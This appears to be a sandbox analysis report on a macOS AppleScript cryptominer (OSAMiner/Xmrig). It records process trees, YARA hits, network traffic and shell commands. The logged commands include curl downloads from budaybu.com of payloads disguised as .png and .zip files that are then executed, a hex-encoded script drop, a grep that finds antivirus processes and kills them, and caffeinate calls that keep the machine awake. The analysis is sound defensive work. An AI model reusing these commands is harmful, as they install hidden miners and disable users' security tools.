          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -i &> /dev/null & echo $!
            • sh New Fork (PID: 570, Parent: 569)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -i
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -m &> /dev/null & echo $!
            • sh New Fork (PID: 572, Parent: 571)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -m
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -s &> /dev/null & echo $!
            • sh New Fork (PID: 574, Parent: 573)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -s
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'
            • sh New Fork (PID: 577, Parent: 576)
            • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: /usr/sbin/system_profiler SPHardwareDataType
            • sh New Fork (PID: 578, Parent: 576)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk /Serial/ { print $NF }
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c mkdir ~/library/Caches
          • mkdir (MD5: 135a3b94b3d9efccb4c8cd23ac404571) Arguments: mkdir /Users/henry/library/Caches
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c mkdir ~/library/Caches/com.apple.R0
          • mkdir (MD5: 135a3b94b3d9efccb4c8cd23ac404571) Arguments: mkdir /Users/henry/library/Caches/com.apple.R0
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c system_profiler SPHardwareDataType
          • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: system_profiler SPHardwareDataType
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c [ -e ~/library/Caches/com.apple.R0/ssl4.plist ] && echo true || echo false
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl -L http://budaybu.com:8080/ssl.zip -o ~/library/Caches/com.apple.R0/ssl.zip
          • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl -L http://budaybu.com:8080/ssl.zip -o /Users/henry/library/Caches/com.apple.R0/ssl.zip
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/bin/ditto -xk ~/library/Caches/com.apple.R0/ssl.zip ~/library/Caches/com.apple.R0
          • ditto (MD5: 5e90ed3b53d4ac63096f6727363249c5) Arguments: /usr/bin/ditto -xk /Users/henry/library/Caches/com.apple.R0/ssl.zip /Users/henry/library/Caches/com.apple.R0
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/library/Caches/com.apple.R0/ssl.zip
          • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/library/Caches/com.apple.R0/ssl.zip
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c cd ~/library/Caches/com.apple.R0 ~/library/Caches/com.apple.R0/ssl4.plist &> /dev/null & exit
            • sh New Fork (PID: 596, Parent: 595)
            • ssl4.plist (MD5: deb6c97315615faa44a0ac07244e7570) Arguments: /Users/henry/library/Caches/com.apple.R0/ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/Library/11.png
      • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/Library/11.png
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
gqnmir4HusJoeSecurity_OSAMinerYara detected OSAMinerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /Users/henry/Library/11.pngJoeSecurity_OSAMinerYara detected OSAMinerJoe Security
      /Users/henry/Library/Caches/com.apple.R0/config.txtJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        /Users/henry/Library/Caches/com.apple.R0/cpu.txtJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          /Users/henry/Library/Caches/com.apple.R0/pools.txtJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            /Users/henry/Library/Caches/com.apple.R0/.BC.T_brE6fGJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              Bitcoin Miner:

              barindex
              Yara detected OSAMinerShow sources
              Source: Yara matchFile source: gqnmir4Hus, type: SAMPLE
              Source: Yara matchFile source: /Users/henry/Library/11.png, type: DROPPED
              Yara detected Xmrig cryptocurrency minerShow sources
              Source: Yara matchFile source: /Users/henry/Library/Caches/com.apple.R0/config.txt, type: DROPPED
              Source: Yara matchFile source: /Users/henry/Library/Caches/com.apple.R0/cpu.txt, type: DROPPED
              Source: Yara matchFile source: /Users/henry/Library/Caches/com.apple.R0/pools.txt, type: DROPPED
              Source: Yara matchFile source: /Users/henry/Library/Caches/com.apple.R0/.BC.T_brE6fG, type: DROPPED
              Executes the "caffeinate" command used to prevent the system from disk/display/system sleeping indicative for minersShow sources
              Source: /bin/sh (PID: 568)Caffeinate executable: /usr/bin/caffeinate caffeinate -dJump to behavior
              Source: /bin/sh (PID: 570)Caffeinate executable: /usr/bin/caffeinate caffeinate -iJump to behavior
              Source: /bin/sh (PID: 572)Caffeinate executable: /usr/bin/caffeinate caffeinate -mJump to behavior
              Source: /bin/sh (PID: 574)Caffeinate executable: /usr/bin/caffeinate caffeinate -sJump to behavior
              Found strings related to Crypto-MiningShow sources
              Source: .BC.T_brE6fG.340.drString found in binary or memory: pools.txt
              Source: .BC.T_brE6fG.340.drString found in binary or memory: Cryptonight hash self-test NOT defined for POW %s
              Source: global trafficTCP traffic: 192.168.0.50:49243 -> 43.249.204.231:8080
              Source: global trafficTCP traffic: 192.168.0.50:49247 -> 185.134.22.134:14441
              Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.205
              Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.205
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-zip-compressedLast-Modified: Thu, 23 Jan 2020 07:29:43 GMTAccept-Ranges: bytesETag: "f0a08ee1bed1d51:0"Server: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Fri, 15 Jan 2021 10:00:49 GMTContent-Length: 1629446Data Raw: 50 4b 03 04 0a 00 00 00 00 00 68 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 08 00 10 00 6f 70 65 6e 73 73 6c 2f 55 58 0c 00 24 68 25 5e 24 68 25 5e f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 84 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 10 00 6f 70 65 6e 73 73 6c 2f 6c 69 62 2f 55 58 0c 00 58 68 25 5e 58 68 25 5e f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 1d 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 21 00 10 00 6f 70 65 6e 73 73 6c 2f 6c 69 62 2f 6c 69 62 63 72 79 70 74 6f 2e 31 2e 30 2e 30 2e 64 79 6c 69 62 55 58 0c 00 9a 67 25 5e 9a 67 25 5e f5 01 14 00 ec bd 0b 7c 54 d5 b5 30 3e 93 4c 92 09 99 b0 07 89 18 35 40 d0 68 c1 a2 e6 38 68 a1 45 9b 03 33 72 06 67 20 15 10 ab 20 28 12 b1 02 49 21 11 ed 95 e7 24 9a dd e3 68 ea ab f4 5a af b4 b5 b7 f6 71 bf 8b da a6 88 15 67 02 e4 85 40 c2 23 84 57 12 de 13 02 4c 20 3c c2 2b f3 ad b5 f6 99 67 c2 43 7b ef f7 ff fd fe bf 06 66 ce 7e ae bd d6 da eb b5 f7 d9 e7 cc e6 0b c7 bb 92 74 3a 7d bc 4e a7 4b 84 4f 2a 7c 3c 90 28 d1 99 75 f8 77 33 7c 06 c7 e9 74 d3 a6 4d b4 3d 3e 51 d7 fd 6f c9 ad 3d e6 13 b4 4f a2 56 3c 6d 5a e1 cc 97 0a c3 cd ba c1 13 c3 e9 66 0d bf 29 94 37 45 c2 35 e8 96 44 66 a7 4d 9b 5f 58 f4 cc fc 2b c2 9b a5 08 38 89 f1 e1 bc 3e a2 bf 51 83 17 c6 0f e1 4d 9b 35 73 76 c1 cc 79 3d c0 2b 78 44 c0 bb 25 21 9c 8f bb 2a 7e 33 f2 e7 ce 2f 8c c8 47 c3 f3 e4 0a 78 d5 e3 e2 42 f9 44 dd 95 ff 00 de fc c2 79 cf cf 7d ee 0a f0 ca 3e bc 99 ae 07 ff a4 0f e5 0d 11 fd a3 70 a5 fe 45 73 17 3c 3f f7 d9 69 cf cf cd cb ef 01 5e e1 58 31 8f cb 87 86 f3 b1 30 22 ff 70 f4 6a 92 13 ab 3c 51 8e a8 08 ca 47 4b 5c 74 7e a5 c8 c7 6b 1f 63 08 af b9 b3 a7 cd 7f 79 ce 33 f9 b3 a7 15 14 ce bb 22 3c 63 44 3e 3e a2 1a 79 b8 34 8a ce e7 f2 0b a3 f2 d1 f0 8c 1a bc 15 11 f9 58 78 cb a2 fa cf 7e fa 6a f8 7d 1c c4 cf 10 ce 47 c2 03 5d d3 bd 17 05 6f 4e 3e 4e c2 f3 85 d3 f2 8a e6 ce e8 06 6f 65 71 34 bd 98 8f 84 97 ac 8b fe eb 2e 77 d1 f0 3c 1a bc e9 3f 8f 0b e5 0d ba 2b ff 4d 9b f6 ec d3 85 4f 47 e6 a3 e1 65 b2 01 74 35 df 1c ce 5f 1d de 33 f3 e7 47 e5 a3 e1 65 0f 16 f0 72 ee 0b 97 45 c2 8b d4 61 d1 7f 46 fe 9c 39 f9 73 af 04 af e0 09 01 2f 3b a2 4f 24 ff 62 e1 21 19 0a c1 71 d8 c7 3d 62 b3 da 83 3a 31 7d 80 96 d0 b4 34 5b e4 87 06 12 42 70 22 61 a1 1d 9d 0e 9f f4 60 b9 5e 4f 9f 9c 99 2f cd 9c 51 54 f8 f4 33 b3 67 4e 2b 78 ba 70 d6 bd f9 05 33 e7 ce 9f 3f fb de d9 cf 3f 83 9f 19 f3 5e 2e 28 cc bf 47 ba 27 1b fe 3d fb 32 94 e8 7a fc bb 0d 24 3f 5b c3 43 c9 04 9c 73 07 e8 5e 8a a8 f7 40 be 1a 84 a6 f4 c7 03 74 b3 de d6 93 ee 22 2e ed e6 4c 9d da 5f a7 bb 74 7c 90 2e 5b 8e d3 a5 40 59 ae d6 e7 b8 51 7c d2 d3 c0 76 43 9b 57 7b 1e 9a fe 56 b4 0e d2 dd 14 cb 3c f8 bb 55 1b e7 e7 23 d8 c4 5f 8f fe 7e bf 4f 7e d5 ff f9 27 fa 6e 74 65 e9 34 13 9f dc 4b a7 e
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.budaybu100001.com:8080User-Agent: curl/7.54.0Accept: */*
              Source: global trafficHTTP traffic detected: GET /budaybu.png HTTP/1.1Host: budaybu.com:8080User-Agent: curl/7.54.0Accept: */*
              Source: global trafficHTTP traffic detected: GET /ssl.zip HTTP/1.1Host: budaybu.com:8080User-Agent: curl/7.54.0Accept: */*
              Source: unknownDNS traffic detected: queries for: www.budaybu100001.com
              Source: /Users/henry/library/Caches/com.apple.R0/ssl4.plist (PID: 596)Reads from socket in process: dataJump to behavior
              Source: .BC.T_brE6fG.340.drString found in binary or memory: https://github.com/fireice-uk/cryptonote-speedup-demo
              Source: .BC.T_brE6fG.340.drString found in binary or memory: https://ryo-currency.com
              Source: /Users/henry/library/Caches/com.apple.R0/ssl4.plist (PID: 596)Writes from socket in process: dataJump to behavior
              Source: /bin/sh (PID: 592)SIGKILL sent: pid: 360, result: successfulJump to behavior
              Source: classification engineClassification label: mal80.evad.mine.mac@0/12@3/0

              Persistence and Installation Behavior:

              barindex
              Writes compiled Apple script to disk (with potentially malicious intention)Show sources
              Source: /bin/sh (PID: 549)File written: /Users/henry/Library/k.plistJump to dropped file
              Source: /usr/bin/curl (PID: 559)File written: /Users/henry/Library/11.pngJump to dropped file
              Source: /bin/sh (PID: 586)Ditto command executed: /usr/bin/ditto -xk /Users/henry/library/Caches/com.apple.R0/ssl.zip /Users/henry/library/Caches/com.apple.R0Jump to behavior
              Source: /usr/bin/sudo (PID: 548)Osascript command executed: osascript /Users/henry/Desktop/gqnmir4Hus.scptJump to behavior
              Source: /bin/sh (PID: 551)Osascript command executed: osascript /Users/henry/Library/k.plistJump to behavior
              Source: /bin/sh (PID: 561)Osascript command executed: osascript /Users/henry/Library/11.pngJump to behavior
              Source: /usr/bin/osascript (PID: 549)Shell command executed: sh -c printf '%b' '\x46\x61\x73\x64\x55\x41\x53\x20\x31\x2E\x31\x30\x31\x2E\x31\x30\x0E\x00\x00\x00\x04\x0F\xFF\xFF\xFF\xFE\x00\x01\x00\x02\x01\xFF\xFF\x00\x00\x01\xFF\xFE\x00\x00\x0E\x00\x01\x00\x00\x0F\x10\x00\x02\x00\x06\xFF\xFD\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x01\xFF\xFD\x00\x00\x10\x00\x03\x00\x04\xFF\xFC\xFF\xFB\xFF\xFA\xFF\xF9\x0B\xFF\xFC\x00\x05\x30\x00\x01\x65\x00\x00\x0B\xFF\xFB\x00\x05\x30\x00\x01\x64\x00\x00\x0B\xFF\xFA\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x0A\xFF\xF9\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x0E\x00\x04\x00\x07\x10\xFF\xF8\xFF\xF7\xFF\xF6\xFF\xF5\x00\x08\x00\x09\xFF\xF4\x0B\xFF\xF8\x00\x05\x30\x00\x01\x65\x00\x00\x01\xFF\xF7\x00\x00\x0E\xFF\xF6\x00\x02\x04\xFF\xF3\x00\x0A\x03\xFF\xF3\x00\x01\x0E\x00\x0A\x00\x01\x00\xFF\xF2\x0B\xFF\xF2\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xF5\x00\x00\x10\x00\x08\x00\x03\xFF\xF1\xFF\xF0\xFF\xEF\x0B\xFF\xF1\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xF0\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xEF\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x09\x00\x08\xFF\xEE\xFF\xED\xFF\xEC\xFF\xEB\xFF\xEA\xFF\xE9\xFF\xE8\xFF\xE7\x0A\xFF\xEE\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xED\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xEC\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xEB\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xEA\x00\x64\x0A\xFF\xE9\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xE8\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xE7\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xF4\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1E\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x05\x00\x07\x10\xFF\xE6\xFF\xE5\xFF\xE4\xFF\xE3\x00\x0B\x00\x0C\xFF\xE2\x0B\xFF\xE6\x00\x05\x30\x00\x01\x64\x00\x00\x01\xFF\xE5\x00\x00\x0E\xFF\xE4\x00\x02\x04\xFF\xE1\x00\x0D\x03\xFF\xE1\x00\x01\x0E\x00\x0D\x00\x01\x00\xFF\xE0\x0B\xFF\xE0\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xE3\x00\x00\x10\x00\x0B\x00\x03\xFF\xDF\xFF\xDE\xFF\xDD\x0B\xFF\xDF\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xDE\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xDD\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x0C\x00\x08\xFF\xDC\xFF\xDB\xFF\xDA\xFF\xD9\xFF\xD8\xFF\xD7\xFF\xD6\xFF\xD5\x0A\xFF\xDC\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xDB\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xDA\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xD9\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xD8\x00\x64\x0A\xFF\xD7\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xD6\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xD5\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xE2\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1F\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x06\x00\x07\x10\xFF\xD4\xFF\xD3\xFF\xD2\xFF\xD1\x00\x0E\Jump to behavior
              Source: /usr/bin/osascript (PID: 550)Shell command executed: sh -c osascript ~/Library/k.plist > /dev/null 2> /dev/null &Jump to behavior
              Source: /usr/bin/osascript (PID: 587)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 592)Shell command executed: sh -c kill -9 360Jump to behavior
              Source: /usr/bin/osascript (PID: 597)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 603)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 608)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 614)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 619)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 625)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 630)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 636)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 641)Shell command executed: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'Jump to behavior
              Source: /usr/bin/osascript (PID: 552)Shell command executed: sh -c rm ~/Library/k.plistJump to behavior
              Source: /usr/bin/osascript (PID: 553)Shell command executed: sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'Jump to behavior
              Source: /usr/bin/osascript (PID: 557)Shell command executed: sh -c ping -c 1 www.apple.comJump to behavior
              Source: /usr/bin/osascript (PID: 558)Shell command executed: sh -c curl http://www.budaybu100001.com:8080Jump to behavior
              Source: /usr/bin/osascript (PID: 559)Shell command executed: sh -c curl -L http://budaybu.com:8080/budaybu.png -o ~/Library/11.pngJump to behavior
              Source: /usr/bin/osascript (PID: 560)Shell command executed: sh -c osascript ~/Library/11.png > /dev/null 2> /dev/null &Jump to behavior
              Source: /usr/bin/osascript (PID: 562)Shell command executed: sh -c df -g / | grep / | grep -v grep | awk '{print $2}'Jump to behavior
              Source: /usr/bin/osascript (PID: 567)Shell command executed: sh -c caffeinate -d &> /dev/null & echo $!Jump to behavior
              Source: /usr/bin/osascript (PID: 569)Shell command executed: sh -c caffeinate -i &> /dev/null & echo $!Jump to behavior
              Source: /usr/bin/osascript (PID: 571)Shell command executed: sh -c caffeinate -m &> /dev/null & echo $!Jump to behavior
              Source: /usr/bin/osascript (PID: 573)Shell command executed: sh -c caffeinate -s &> /dev/null & echo $!Jump to behavior
              Source: /usr/bin/osascript (PID: 576)Shell command executed: sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'Jump to behavior
              Source: /usr/bin/osascript (PID: 580)Shell command executed: sh -c mkdir ~/library/CachesJump to behavior
              Source: /usr/bin/osascript (PID: 581)Shell command executed: sh -c mkdir ~/library/Caches/com.apple.R0Jump to behavior
              Source: /usr/bin/osascript (PID: 582)Shell command executed: sh -c system_profiler SPHardwareDataTypeJump to behavior
              Source: /usr/bin/osascript (PID: 584)Shell command executed: sh -c [ -e ~/library/Caches/com.apple.R0/ssl4.plist ] && echo true || echo falseJump to behavior
              Source: /usr/bin/osascript (PID: 585)Shell command executed: sh -c curl -L http://budaybu.com:8080/ssl.zip -o ~/library/Caches/com.apple.R0/ssl.zipJump to behavior
              Source: /usr/bin/osascript (PID: 586)Shell command executed: sh -c /usr/bin/ditto -xk ~/library/Caches/com.apple.R0/ssl.zip ~/library/Caches/com.apple.R0Jump to behavior
              Source: /usr/bin/osascript (PID: 593)Shell command executed: sh -c rm ~/library/Caches/com.apple.R0/ssl.zipJump to behavior
              Source: /usr/bin/osascript (PID: 594)Shell command executed: sh -c pgrep ssl4.plistJump to behavior
              Source: /usr/bin/osascript (PID: 595)Shell command executed: sh -c cd ~/library/Caches/com.apple.R0 ~/library/Caches/com.apple.R0/ssl4.plist &> /dev/null & exitJump to behavior
              Source: /usr/bin/osascript (PID: 602)Shell command executed: sh -c pgrep ssl4.plistJump to behavior
              Source: /usr/bin/osascript (PID: 613)Shell command executed: sh -c pgrep ssl4.plistJump to behavior
              Source: /usr/bin/osascript (PID: 624)Shell command executed: sh -c pgrep ssl4.plistJump to behavior
              Source: /usr/bin/osascript (PID: 635)Shell command executed: sh -c pgrep ssl4.plistJump to behavior
              Source: /usr/bin/osascript (PID: 575)Shell command executed: sh -c rm ~/Library/11.pngJump to behavior
              Source: /bin/sh (PID: 558)Curl executable: /usr/bin/curl -> curl http://www.budaybu100001.com:8080Jump to behavior
              Source: /bin/sh (PID: 559)Curl executable: /usr/bin/curl -> curl -L http://budaybu.com:8080/budaybu.png -o /Users/henry/Library/11.pngJump to behavior
              Source: /bin/sh (PID: 585)Curl executable: /usr/bin/curl -> curl -L http://budaybu.com:8080/ssl.zip -o /Users/henry/library/Caches/com.apple.R0/ssl.zipJump to behavior
              Source: /bin/sh (PID: 589)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 590)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 599)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 600)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 605)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 606)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 610)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 611)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 616)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 617)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 621)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 622)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 627)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 628)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 632)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 633)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 638)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 639)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 643)Grep executable: /usr/bin/grep -> grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMacJump to behavior
              Source: /bin/sh (PID: 644)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 564)Grep executable: /usr/bin/grep -> grep /Jump to behavior
              Source: /bin/sh (PID: 565)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
              Source: /bin/sh (PID: 580)Mkdir executable: /bin/mkdir -> mkdir /Users/henry/library/CachesJump to behavior
              Source: /bin/sh (PID: 581)Mkdir executable: /bin/mkdir -> mkdir /Users/henry/library/Caches/com.apple.R0Jump to behavior
              Source: /bin/sh (PID: 594)Pgrep executable: /usr/bin/pgrep -> pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 602)Pgrep executable: /usr/bin/pgrep -> pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 613)Pgrep executable: /usr/bin/pgrep -> pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 624)Pgrep executable: /usr/bin/pgrep -> pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 635)Pgrep executable: /usr/bin/pgrep -> pgrep ssl4.plistJump to behavior
              Source: /bin/sh (PID: 557)Ping executable: /sbin/ping -> ping -c 1 www.apple.comJump to behavior
              Source: /bin/sh (PID: 588)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 598)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 604)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 609)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 615)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 620)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 626)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 631)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 637)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 642)Ps executable: /bin/ps -> ps axJump to behavior
              Source: /bin/sh (PID: 552)Rm executable: /bin/rm -> rm /Users/henry/Library/k.plistJump to behavior
              Source: /bin/sh (PID: 593)Rm executable: /bin/rm -> rm /Users/henry/library/Caches/com.apple.R0/ssl.zipJump to behavior
